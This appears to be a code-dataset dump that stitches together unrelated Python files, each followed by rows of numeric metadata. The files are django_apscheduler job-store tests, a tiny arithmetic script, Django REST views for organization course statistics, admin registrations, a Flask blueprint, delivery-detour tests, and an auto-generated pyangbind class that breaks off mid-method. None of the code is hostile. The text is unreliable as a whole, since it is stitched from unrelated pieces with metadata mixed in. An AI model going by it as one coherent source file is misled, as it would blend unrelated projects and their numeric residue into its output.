        assert not DjangoJobExecution.objects.filter(job_id=evt.job_id).exists()

    @pytest.mark.django_db
    def test_handle_error_event_not_supported_raises_exception(self, jobstore):
        evt = JobExecutionEvent(
            events.EVENT_ALL, "test_job", jobstore, timezone.now()
        )

        with pytest.raises(NotImplementedError):
            jobstore.handle_error_event(evt)

    @pytest.mark.django_db
    @pytest.mark.parametrize(
        "event_code",
        [
            events.EVENT_JOB_MISSED,
            events.EVENT_JOB_ERROR,
        ],
    )
    def test_handle_error_event_creates_job_execution(
        self, jobstore, create_add_job, event_code
    ):
        scheduled_job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
        evt = JobExecutionEvent(event_code, scheduled_job.id, jobstore, timezone.now())
        jobstore.handle_error_event(evt)

        assert DjangoJobExecution.objects.filter(job_id=evt.job_id).exists()

    @pytest.mark.django_db
    def test_handle_error_event_no_exception_sets_exception_text(
        self, jobstore, create_add_job
    ):
        # When the event carries no exception object, a default message is stored.
        scheduled_job = create_add_job(jobstore, dummy_job, datetime(2016, 5, 3))
        evt = JobExecutionEvent(
            events.EVENT_JOB_ERROR, scheduled_job.id, jobstore, timezone.now()
        )
        jobstore.handle_error_event(evt)

        execution = DjangoJobExecution.objects.get(job_id=evt.job_id)
        assert "raised an error!" in execution.exception

    @pytest.mark.django_db(transaction=True)
    def test_handle_error_event_for_job_that_no_longer_exists_does_not_raise_exception(
        self, jobstore
    ):
        evt = JobExecutionEvent(
            events.EVENT_JOB_ERROR, "finished_job", jobstore, timezone.now()
        )
        jobstore.handle_error_event(evt)

        assert not DjangoJobExecution.objects.filter(job_id=evt.job_id).exists()

    @pytest.mark.django_db
    def test_register_event_listeners_registers_listeners(self, jobstore):
        jobstore.register_event_listeners()

        registered_codes = {listener[1] for listener in jobstore._scheduler._listeners}
        for expected_code in (
            events.EVENT_JOB_SUBMITTED | events.EVENT_JOB_MAX_INSTANCES,
            events.EVENT_JOB_EXECUTED,
            events.EVENT_JOB_ERROR | events.EVENT_JOB_MISSED,
        ):
            assert expected_code in registered_codes
class TestDjangoJobStore:
    """
    The upstream APScheduler test suite is relied on to confirm that
    DjangoJobStore implements the job store interface correctly; only
    behaviour specific to DjangoJobStore is covered here.

    See 'test_apscheduler_jobstore.py' for details.
    """

    def _assert_retries_on_operational_error(self, patch_target, action):
        # Shared scenario: make the patched ORM call raise an OperationalError
        # and verify that the stale DB connection is closed exactly once before
        # the error propagates to the caller.
        with mock.patch.object(db.connection, "close") as close_patch, \
                pytest.raises(db.OperationalError, match="Some DB-related error"), \
                mock.patch(patch_target, side_effect=conftest.raise_db_operational_error):
            action()

        assert close_patch.call_count == 1

    @pytest.mark.django_db(transaction=True)
    def test_lookup_job_does_retry_on_db_operational_error(self, jobstore):
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.get",
            lambda: jobstore.lookup_job("some job"),
        )

    @pytest.mark.django_db(transaction=True)
    def test_get_due_jobs_does_retry_on_db_operational_error(self, jobstore):
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.filter",
            lambda: jobstore.get_due_jobs(datetime(2016, 5, 3)),
        )

    @pytest.mark.django_db(transaction=True)
    def test_get_next_run_time_does_retry_on_db_operational_error(self, jobstore):
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.filter",
            jobstore.get_next_run_time,
        )

    @pytest.mark.django_db(transaction=True)
    def test_add_job_does_retry_on_db_operational_error(self, jobstore, create_job):
        job = create_job(
            func=dummy_job,
            trigger="date",
            trigger_args={"run_date": datetime(2016, 5, 3)},
            id="test",
        )
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.create",
            lambda: jobstore.add_job(job),
        )

    @pytest.mark.django_db(transaction=True)
    def test_update_job_does_retry_on_db_operational_error(self, jobstore, create_job):
        job = create_job(
            func=dummy_job,
            trigger="date",
            trigger_args={"run_date": datetime(2016, 5, 3)},
            id="test",
        )
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.get",
            lambda: jobstore.update_job(job),
        )

    @pytest.mark.django_db(transaction=True)
    def test_remove_job_does_retry_on_db_operational_error(self, jobstore):
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.get",
            lambda: jobstore.remove_job("some job"),
        )

    @pytest.mark.django_db(transaction=True)
    def test_remove_all_jobs_does_retry_on_db_operational_error(self, jobstore):
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.all",
            jobstore.remove_all_jobs,
        )

    @pytest.mark.django_db(transaction=True)
    def test_get_jobs_does_retry_on_db_operational_error(self, jobstore):
        self._assert_retries_on_operational_error(
            "django_apscheduler.jobstores.DjangoJob.objects.filter",
            jobstore._get_jobs,
        )
@pytest.mark.django_db
def test_register_events_raises_deprecation_warning(scheduler, jobstore):
    """register_events() is deprecated and should emit exactly one warning."""
    with warnings.catch_warnings(record=True) as caught:
        register_events(scheduler, jobstore)

    assert len(caught) == 1
    last_warning = caught[-1]
    assert issubclass(last_warning.category, DeprecationWarning)
    assert "deprecated" in str(last_warning.message)
@pytest.mark.django_db
def test_register_job(scheduler, jobstore):
    """The register_job decorator should schedule the wrapped callable."""
    decorator = register_job(scheduler, "interval", seconds=1)
    decorator(dummy_job)
    scheduler.start()

    assert DjangoJob.objects.count() == 1
@pytest.mark.django_db
def test_register_job_raises_deprecation_warning(scheduler, jobstore):
    """register_job() is deprecated and should emit exactly one warning."""
    with warnings.catch_warnings(record=True) as caught:
        register_job(scheduler, "interval", seconds=1)(dummy_job)

    assert len(caught) == 1
    last_warning = caught[-1]
    assert issubclass(last_warning.category, DeprecationWarning)
    assert "deprecated" in str(last_warning.message)
| 38.032051
| 106
| 0.666358
| 1,366
| 11,866
| 5.489019
| 0.116398
| 0.032009
| 0.046946
| 0.052814
| 0.807682
| 0.788744
| 0.778741
| 0.758469
| 0.724193
| 0.644572
| 0
| 0.007628
| 0.248694
| 11,866
| 311
| 107
| 38.154341
| 0.833427
| 0.025198
| 0
| 0.602459
| 0
| 0
| 0.070519
| 0.035693
| 0
| 0
| 0
| 0
| 0.098361
| 1
| 0.094262
| false
| 0
| 0.04918
| 0
| 0.151639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3f818ff851bf166cd809361e7114d1dff6eaefec
| 151
|
py
|
Python
|
tests/test00.py
|
mykarl/python-to-perl
|
521f1907d183e69a125d585427550a346b43345f
|
[
"MIT"
] | null | null | null |
tests/test00.py
|
mykarl/python-to-perl
|
521f1907d183e69a125d585427550a346b43345f
|
[
"MIT"
] | null | null | null |
tests/test00.py
|
mykarl/python-to-perl
|
521f1907d183e69a125d585427550a346b43345f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# Cube a small base twice: number becomes 2**3 == 8, and 8**3 == 512 is printed.
number = 2
number = number ** 3
print(number ** 3)
print("!@#$%^&*()-=")  # testing character matching
| 18.875
| 51
| 0.635762
| 17
| 151
| 5.647059
| 0.529412
| 0.625
| 0.5625
| 0.479167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.165563
| 151
| 7
| 52
| 21.571429
| 0.746032
| 0.291391
| 0
| 0
| 0
| 0
| 0.114286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
b7a0a1f109c3984f603312d7647beb6d6a210b10
| 14,518
|
py
|
Python
|
v1/OrganizationAPI/views.py
|
DhruvThakker/organization_dashboard_api
|
1c140149be7a3c936f67f2cd5fcc7332f1365047
|
[
"MIT"
] | null | null | null |
v1/OrganizationAPI/views.py
|
DhruvThakker/organization_dashboard_api
|
1c140149be7a3c936f67f2cd5fcc7332f1365047
|
[
"MIT"
] | null | null | null |
v1/OrganizationAPI/views.py
|
DhruvThakker/organization_dashboard_api
|
1c140149be7a3c936f67f2cd5fcc7332f1365047
|
[
"MIT"
] | null | null | null |
from rest_framework import generics
from api import *
from serializers import OrganizationSerializer, OrganizationStudentSerializer, OrganizationGradeSerializer, OrganizationCertificateSerializer
from rest_framework.permissions import IsAdminUser
from django.http import Http404
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from oauth2_provider.ext.rest_framework.authentication import OAuth2Authentication
# Create your views here.
class OrganizationList(generics.ListAPIView):
    """
    **Use Case**

        Get a paginated list of organizations with all their courses in the
        edX platform. Each page in the list can contain up to 10 courses.

    **Example Requests**

        GET /api/organizations/v1/summary/

    **Response Values**

        On success with Response Code <200>

        * count: The number of courses in the edX platform.
        * next: The URI to the next page of courses.
        * previous: The URI to the previous page of courses.
        * num_pages: The number of pages listing courses.
        * results: A list of courses returned. Each collection in the list
          contains these fields.

            * organization: The name of the organization.
            * courses:

                * id: The unique identifier for the course.
                * display_name: The display name of the course.
                * start: The course start date.
                * end: The course end date; null when not specified.
                * enrollment_start: The course enrollment start date.
                * enrollment_end: The course enrollment end date; null when
                  not specified.

    **ERROR RESPONSES**

        * Response Code <403> FORBIDDEN
    """

    # Admin-only, read-only endpoint; the queryset is built once at import time.
    queryset = get_all_organization()
    serializer_class = OrganizationSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (
        SessionAuthentication,
        BasicAuthentication,
        OAuth2Authentication,
    )
class OrganizationDetail(generics.RetrieveAPIView):
    """
    **Use Case**

        Get all the courses for a specific organization.

    **Example Requests**

        GET /api/organizations/v1/summary/{organization_name}

    **Response Values**

        On success with Response Code <200>

        * organization: The name of the organization.
        * courses:

            * id: The unique identifier for the course.
            * display_name: The display name of the course.
            * start: The course start date.
            * end: The course end date; null when not specified.
            * enrollment_start: The course enrollment start date.
            * enrollment_end: The course enrollment end date; null when not
              specified.

    **ERROR RESPONSES**

        * Response Code <404> ORGANIZATION NOT FOUND
        * Response Code <403> FORBIDDEN
    """

    serializer_class = OrganizationSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)

    def get_object(self):
        """Return the course summary for the organization named in the URL.

        Raises Http404 when the organization cannot be resolved or the lookup
        result is malformed.
        """
        try:
            organization = self.kwargs['organization']
            data = get_all_courses(organization)  # renamed from `list`: avoid shadowing the builtin
            data['organization']  # probe: a result without this key is treated as "not found"
            return data
        except Exception:
            # Was a bare `except:`, which also traps SystemExit and
            # KeyboardInterrupt; `Exception` keeps the intended "any lookup
            # failure becomes a 404" behaviour without swallowing those.
            raise Http404
class OrganizationCountList(generics.ListAPIView):
    """
    **Use Case**

        Get a paginated list of organizations with all their courses and the
        count of students in the edX platform. Each page in the list can
        contain up to 10 courses.

    **Example Requests**

        GET /api/organizations/v1/count/

    **Response Values**

        On success with Response Code <200>

        * count: The number of courses in the edX platform.
        * next: The URI to the next page of courses.
        * previous: The URI to the previous page of courses.
        * num_pages: The number of pages listing courses.
        * results: A list of courses returned. Each collection in the list
          contains these fields.

            * organization: The name of the organization.
            * courses:

                * id: The unique identifier for the course.
                * display_name: The display name of the course.
                * start: The course start date.
                * end: The course end date; null when not specified.
                * enrollment_start: The course enrollment start date.
                * enrollment_end: The course enrollment end date; null when
                  not specified.
                * students: Count of students in the course

    **ERROR RESPONSES**

        * Response Code <403> FORBIDDEN
    """

    # Admin-only, read-only endpoint; the queryset is built once at import time.
    queryset = get_all_organization_count_students()
    serializer_class = OrganizationStudentSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (
        SessionAuthentication,
        BasicAuthentication,
        OAuth2Authentication,
    )
class OrganizationCountDetail(generics.RetrieveAPIView):
    """
    **Use Case**

        Get all the courses and count of students for a specific organization.

    **Example Requests**

        GET /api/organizations/v1/count/{organization_name}

    **Response Values**

        On success with Response Code <200>

        * organization: The name of the organization.
        * courses:

            * id: The unique identifier for the course.
            * display_name: The display name of the course.
            * start: The course start date.
            * end: The course end date; null when not specified.
            * enrollment_start: The course enrollment start date.
            * enrollment_end: The course enrollment end date; null when not
              specified.
            * students: Count of students in the course

    **ERROR RESPONSES**

        * Response Code <404> ORGANIZATION NOT FOUND
        * Response Code <403> FORBIDDEN
    """

    serializer_class = OrganizationStudentSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)

    def get_object(self):
        """Return courses plus student counts for the organization in the URL.

        Raises Http404 when the organization cannot be resolved or the lookup
        result is malformed.
        """
        try:
            organization = self.kwargs['organization']
            data = get_all_courses_count_students(organization)  # renamed from `list`: avoid shadowing the builtin
            data['organization']  # probe: a result without this key is treated as "not found"
            return data
        except Exception:
            # Was a bare `except:`; `Exception` preserves the "any failure is
            # a 404" intent without trapping SystemExit/KeyboardInterrupt.
            raise Http404
class OrganizationGradeList(generics.ListAPIView):
    """
    **Use Case**

        Get a paginated list of organizations with all their courses and
        students in the edX platform. Each page in the list can contain up to
        10 courses.

    **Example Requests**

        GET /api/organizations/v1/grade/

    **Response Values**

        On success with Response Code <200>

        * count: The number of courses in the edX platform.
        * next: The URI to the next page of courses.
        * previous: The URI to the previous page of courses.
        * num_pages: The number of pages listing courses.
        * results: A list of courses returned. Each collection in the list
          contains these fields.

            * organization: The name of the organization.
            * courses:

                * course_name: Name of the course
                * course_organization: The organization specified for the course.
                * course_run: The run of the course
                * students:

                    * id: The unique identifier for the student.
                    * username: Username of the student
                    * email: Email of the student
                    * grade: Overall grade of the student in the course
                    * total_score: Total score of the student in the course
                    * is_active: Shows whether the student is active or not
                      (1 if active, 0 if not)
                    * last_login: The date and time at which the student was
                      last active

    **ERROR RESPONSES**

        * Response Code <403> FORBIDDEN
    """

    # Admin-only, read-only endpoint; the queryset is built once at import time.
    queryset = get_all_organization_courses_grades()
    serializer_class = OrganizationGradeSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (
        SessionAuthentication,
        BasicAuthentication,
        OAuth2Authentication,
    )
class OrganizationGradeDetail(generics.RetrieveAPIView):
    """
    **Use Case**

        Get all the courses and students for a specific organization.

    **Example Requests**

        GET /api/organizations/v1/grade/{organization_name}

    **Response Values**

        On success with Response Code <200>

        * organization: The name of the organization.
        * courses:

            * course_name: Name of the course
            * course_organization: The organization specified for the course.
            * course_run: The run of the course
            * students:

                * id: The unique identifier for the student.
                * username: Username of the student
                * email: Email of the student
                * grade: Overall grade of the student in the course
                * total_score: Total score of the student in the course
                * is_active: Shows whether the student is active or not
                  (1 if active, 0 if not)
                * last_login: The date and time at which the student was last
                  active

    **ERROR RESPONSES**

        * Response Code <404> ORGANIZATION NOT FOUND
        * Response Code <403> FORBIDDEN
    """

    serializer_class = OrganizationGradeSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)

    def get_object(self):
        """Return courses plus per-student grades for the organization in the URL.

        Raises Http404 when the organization cannot be resolved or the lookup
        result is malformed.
        """
        try:
            organization = self.kwargs['organization']
            data = get_all_courses_grades(organization)  # renamed from `list`: avoid shadowing the builtin
            data['organization']  # probe: a result without this key is treated as "not found"
            return data
        except Exception:
            # Was a bare `except:`; `Exception` preserves the "any failure is
            # a 404" intent without trapping SystemExit/KeyboardInterrupt.
            raise Http404
class OrganizationCertificateList(generics.ListAPIView):
    """
    **Use Case**

        Get a paginated list of organizations with all their courses and the
        count of certificates in the edX platform. Each page in the list can
        contain up to 10 courses.

    **Example Requests**

        GET /api/organizations/v1/certificate/

    **Response Values**

        On success with Response Code <200>

        * count: The number of courses in the edX platform.
        * next: The URI to the next page of courses.
        * previous: The URI to the previous page of courses.
        * num_pages: The number of pages listing courses.
        * results: A list of courses returned. Each collection in the list
          contains these fields.

            * organization: The name of the organization.
            * courses:

                * course_id: The unique identifier for the course.
                * course_name: Name of the course
                * course_organization: The organization specified for the course.
                * course_run: The run of the course.
                * certificate_count: Count of certificates of the course

    **ERROR RESPONSES**

        * Response Code <403> FORBIDDEN
    """

    # Admin-only, read-only endpoint; the queryset is built once at import time.
    queryset = get_all_organization_certificate_count()
    serializer_class = OrganizationCertificateSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (
        SessionAuthentication,
        BasicAuthentication,
        OAuth2Authentication,
    )
class OrganizationCertificateDetail(generics.RetrieveAPIView):
    """
    **Use Case**

        Get all the courses and count of certificates for a specific
        organization.

    **Example Requests**

        GET /api/organizations/v1/certificate/{organization_name}

    **Response Values**

        On success with Response Code <200>

        * organization: The name of the organization.
        * courses:

            * course_id: The unique identifier for the course.
            * course_name: Name of the course
            * course_organization: The organization specified for the course.
            * course_run: The run of the course.
            * certificate_count: Count of certificates of the course

    **ERROR RESPONSES**

        * Response Code <404> ORGANIZATION NOT FOUND
        * Response Code <403> FORBIDDEN
    """

    serializer_class = OrganizationCertificateSerializer
    permission_classes = (IsAdminUser,)
    authentication_classes = (SessionAuthentication, BasicAuthentication, OAuth2Authentication)

    def get_object(self):
        """Return courses plus certificate counts for the organization in the URL.

        Raises Http404 when the organization cannot be resolved or the lookup
        result is malformed.
        """
        try:
            organization = self.kwargs['organization']
            # Renamed from `list` (builtin shadowing) and stray space before
            # the closing parenthesis removed.
            data = get_organization_certificate_count(organization)
            data['organization']  # probe: a result without this key is treated as "not found"
            return data
        except Exception:
            # Was a bare `except:`; `Exception` preserves the "any failure is
            # a 404" intent without trapping SystemExit/KeyboardInterrupt.
            raise Http404
| 31.69869
| 141
| 0.577766
| 1,416
| 14,518
| 5.852401
| 0.103814
| 0.049958
| 0.017377
| 0.015446
| 0.916737
| 0.913841
| 0.913841
| 0.905032
| 0.892724
| 0.862314
| 0
| 0.011459
| 0.368852
| 14,518
| 458
| 142
| 31.69869
| 0.892939
| 0.625362
| 0
| 0.693333
| 0
| 0
| 0.026265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053333
| false
| 0
| 0.093333
| 0
| 0.68
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b7bc72bbcc88f2f5e9f214e159a50a96cba47e04
| 198
|
py
|
Python
|
src/jober/admin.py
|
kurrbanov/jober
|
ffa792b8242de3dff6af5716b929239732c41b62
|
[
"MIT"
] | null | null | null |
src/jober/admin.py
|
kurrbanov/jober
|
ffa792b8242de3dff6af5716b929239732c41b62
|
[
"MIT"
] | null | null | null |
src/jober/admin.py
|
kurrbanov/jober
|
ffa792b8242de3dff6af5716b929239732c41b62
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
# Register your models here.
# Register each model with the default admin site so they are editable
# through the Django admin interface.
for _model in (Applicant, Company, Like, Match):
    admin.site.register(_model)
| 22
| 32
| 0.80303
| 28
| 198
| 5.678571
| 0.5
| 0.226415
| 0.427673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 198
| 8
| 33
| 24.75
| 0.883333
| 0.131313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b7ed42951af869f5ce9c11974d687d447c7a74e2
| 29
|
py
|
Python
|
videoanalyst/model/backbone/__init__.py
|
lizhenbang56/Manipulating-Template-Pixels-for-Model-Adaptation-of-Siamese-Visual-Tracking
|
76b88d8e68ac3d575a2ce81fc07ee2fce5f050d6
|
[
"MIT"
] | 2
|
2020-07-30T08:26:08.000Z
|
2020-11-24T07:40:46.000Z
|
videoanalyst/model/backbone/__init__.py
|
shartoo/video_analyst
|
db7c1b323f26ec19533a4b19804cf2c8a52643e5
|
[
"MIT"
] | null | null | null |
videoanalyst/model/backbone/__init__.py
|
shartoo/video_analyst
|
db7c1b323f26ec19533a4b19804cf2c8a52643e5
|
[
"MIT"
] | null | null | null |
from .backbone_impl import *
| 29
| 29
| 0.793103
| 4
| 29
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4d1e1ff262c515006e9c040b9b75dac600b06f5f
| 145
|
py
|
Python
|
app/users/__init__.py
|
lpdswing/flask-pyjwt-demo
|
009e052690e19b79a8fa2b0cc3094cc6e193397d
|
[
"Apache-2.0"
] | 3
|
2019-03-20T08:39:50.000Z
|
2019-04-12T13:00:45.000Z
|
app/users/__init__.py
|
lpdswing/flask-pyjwt-demo
|
009e052690e19b79a8fa2b0cc3094cc6e193397d
|
[
"Apache-2.0"
] | null | null | null |
app/users/__init__.py
|
lpdswing/flask-pyjwt-demo
|
009e052690e19b79a8fa2b0cc3094cc6e193397d
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding:utf-8 -*-
# datetime: 2019/3/20 9:21
from flask import Blueprint

# Blueprint for this package; presumably registered on the app elsewhere
# (registration is not visible in this file).
auth = Blueprint('auth', __name__)

# Imported at the bottom, after `auth` is defined, so that the api/urls/model
# modules can import `auth` from this package without a circular-import error.
from . import api, urls, model
| 18.125
| 34
| 0.682759
| 22
| 145
| 4.318182
| 0.818182
| 0.273684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090164
| 0.158621
| 145
| 8
| 35
| 18.125
| 0.688525
| 0.310345
| 0
| 0
| 0
| 0
| 0.040404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
4d963e8d5f477db24af81424b51901e5a9ee4831
| 2,611
|
py
|
Python
|
jobs/tests/tasks/test_update_detours.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 3
|
2020-05-05T12:12:09.000Z
|
2020-05-08T08:48:16.000Z
|
jobs/tests/tasks/test_update_detours.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | 160
|
2020-05-19T13:03:43.000Z
|
2022-03-12T00:35:28.000Z
|
jobs/tests/tasks/test_update_detours.py
|
stanwood/traidoo-api
|
83e8599f2eb54352988bac27e2d4acd30734816d
|
[
"MIT"
] | null | null | null |
from unittest import mock
import pytest
from model_bakery import baker
pytestmark = pytest.mark.django_db
@mock.patch("jobs.tasks.update_detours.calculate_route_length")
def test_update_detours_for_route(
    calculate_route_length_mock, client_anonymous, settings
):
    """A detour on an unprocessed order is refreshed with the newly calculated route length."""
    settings.FEATURES["routes"] = True

    expected_length = 1200
    calculate_route_length_mock.return_value = expected_length

    # Build the object graph: product -> unprocessed order -> order item -> job -> detour.
    seller = baker.make_recipe("users.user")
    product = baker.make(
        "products.Product", seller=seller, third_party_delivery=True
    )
    order = baker.make("orders.Order", processed=False)
    address = baker.make_recipe("delivery_addresses.delivery_address")
    order_item = baker.make(
        "orders.OrderItem",
        order=order,
        product=product,
        delivery_address=address,
    )
    job = baker.make(
        "jobs.Job", order_item=order_item, user=baker.make("users.User")
    )
    route = baker.make("routes.Route")
    detour = baker.make("jobs.Detour", route=route, length=123, job=job)

    # The endpoint only accepts requests coming from the App Engine task queue.
    response = client_anonymous.post(
        f"/detours/update/{route.id}", **{"HTTP_X_APPENGINE_QUEUENAME": "queue"}
    )

    assert response.status_code == 200
    detour.refresh_from_db()
    assert detour.length == expected_length
@mock.patch("jobs.tasks.update_detours.calculate_route_length")
def test_do_not_update_detours_for_processed_orders(
    calculate_route_length_mock, client_anonymous, settings
):
    """A detour belonging to an already-processed order keeps its stored length."""
    settings.FEATURES["routes"] = True

    original_length = 123
    # Would become the new length if the detour were (incorrectly) recalculated.
    calculate_route_length_mock.return_value = 1000

    # Build the object graph: product -> processed order -> order item -> job -> detour.
    seller = baker.make_recipe("users.user")
    product = baker.make(
        "products.Product", seller=seller, third_party_delivery=True
    )
    processed_order = baker.make("orders.Order", processed=True)
    address = baker.make_recipe("delivery_addresses.delivery_address")
    order_item = baker.make(
        "orders.OrderItem",
        order=processed_order,
        product=product,
        delivery_address=address,
    )
    job = baker.make(
        "jobs.Job", order_item=order_item, user=baker.make("users.User")
    )
    route = baker.make("routes.Route")
    detour = baker.make(
        "jobs.Detour", route=route, length=original_length, job=job
    )

    # The endpoint only accepts requests coming from the App Engine task queue.
    response = client_anonymous.post(
        f"/detours/update/{route.id}", **{"HTTP_X_APPENGINE_QUEUENAME": "queue"}
    )

    assert response.status_code == 200
    detour.refresh_from_db()
    assert detour.length == original_length
| 31.457831
| 82
| 0.719648
| 349
| 2,611
| 5.037249
| 0.209169
| 0.09215
| 0.056883
| 0.054608
| 0.894198
| 0.883959
| 0.844141
| 0.844141
| 0.844141
| 0.844141
| 0
| 0.025902
| 0.171965
| 2,611
| 82
| 83
| 31.841463
| 0.787234
| 0
| 0
| 0.65625
| 0
| 0
| 0.186136
| 0.104941
| 0
| 0
| 0
| 0
| 0.0625
| 1
| 0.03125
| false
| 0
| 0.046875
| 0
| 0.078125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4da33b342bc4984c6ee56a48a006eac2c1e2c47a
| 29,677
|
py
|
Python
|
pybind/nos/v7_1_0/rbridge_id/router/ospf/area/virtual_link/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/nos/v7_1_0/rbridge_id/router/ospf/area/virtual_link/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/nos/v7_1_0/rbridge_id/router/ospf/area/virtual_link/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import authentication_key
import md5_authentication
class virtual_link(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-rbridge - based on the path /rbridge-id/router/ospf/area/virtual-link. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.

  NOTE: generated code (Python 2 only -- uses __builtin__, unicode and
  long); manual edits will be lost on regeneration from the YANG model.
  Each leaf/container member gets a _get_*/_set_*/_unset_* triple that
  is wired into a read/write property at the bottom of the class.
  """
  # __slots__ keeps instances dict-free; the double-underscore entries are
  # name-mangled per-member storage for the YANGDynClass wrappers below.
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__virt_link_neighbor','__authentication_key','__dead_interval','__hello_interval','__retransmit_interval','__transmit_delay','__md5_authentication',)

  _yang_name = 'virtual-link'
  _rest_name = 'virtual-link'
  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # Resolve the XPath helper: an explicit kwarg wins (False disables it),
    # otherwise inherit the parent's helper, otherwise disabled.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False

    # Same resolution order for the extension-methods dict.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
